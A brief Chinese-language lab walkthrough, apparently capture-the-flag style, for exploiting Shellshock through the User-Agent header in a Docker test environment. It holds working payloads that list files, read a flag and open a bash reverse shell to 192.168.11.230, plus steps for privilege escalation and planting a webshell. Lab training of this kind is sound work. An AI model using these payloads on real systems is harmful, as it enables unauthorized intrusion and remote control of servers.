注:使用docker搭建测试环境
(1)访问搭建的环境网址:http://192.168.11.101:8081/
(2)使用burp拦截数据包,并修改User-Agent的内容:
(3)使用如下payload:
() { :;};echo ; echo $(/bin/ls -al /);
(4)现在我们cat flag一下
() { :;};echo ; echo $(/bin/cat /flag /);
(5)反弹shell到本机电脑,使用nc监听本机8888端口,输入如下payload:
本机运行nc
nc -lp 8888
User-Agent:
() { :; }; /bin/bash -i >& /dev/tcp/192.168.11.230/8888 0>&1;
(6)提权,使用各种提权方式进行,在tmp目录下写一句话木马,进行菜刀连接